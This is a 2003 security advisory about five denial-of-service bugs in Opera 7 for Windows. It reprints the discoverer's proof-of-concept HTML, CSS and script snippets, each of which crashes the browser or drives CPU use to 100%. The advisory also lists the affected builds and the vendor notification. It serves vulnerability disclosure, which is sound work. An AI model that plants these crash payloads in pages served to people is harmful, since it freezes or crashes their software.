Skip navigation

Denial of Service in Opera

Reported June 30, 2003, by ::Operash::.



VERSIONS AFFECTED

Opera for Windows, versions 7.11b (build 2887), 7.11 (build 2880), 7.10 (build 2840), and 7.03 (build 2670)

DESCRIPTION

Five new unfixed bugs in Opera 7 for Windows Web browser can result in a Denial of Service (DoS) condition.

DEMONSTRATION

The discoverer posted the following demonstrations as proof of concept:

2. SAMPLE CODE & IMPACT

=========================

\[ CODE 1 \]

Just 12 bytes data "<!DOCTYPE" + NULL(\x00) + 1byte + ">" makes

CPU usage go up to 100%(depending on comp specs) and the computer

gets freeze down.


-----------------------------------------------------------------
<!DOCTYPE\[\x00\]A>
-----------------------------------------------------------------

\[ CODE 2 \]

Abnormal termination is caused.

-----------------------------------------------------------------
<form></form><script>document.forms\[0\].submit()</script>
-----------------------------------------------------------------

\[ CODE 3 \]

Abnormal termination is caused.

-----------------------------------------------------------------
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>
-----------------------------------------------------------------

\[ CODE 4 \]

Abnormal termination is caused.

-----------------------------------------------------------------
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>
-----------------------------------------------------------------

\[ CODE 5 \]

CPU usage goes up to 100% (depending on its specs) and the computer
freezes.
-----------------------------------------------------------------

<html>
<head>
<style type="text/css">
<!--
.aaaaa:after\{content:"A";display:block\}
.bbbbb\{display:run-in\}
.ccccc\{display:inline-block\}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>
-----------------------------------------------------------------

VENDOR RESPONSE

Opera was notified on June 24, 2003, but hasn't yet responded to these problems.

CREDIT
Discovered by :: Operash ::.

TAGS: Security
Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish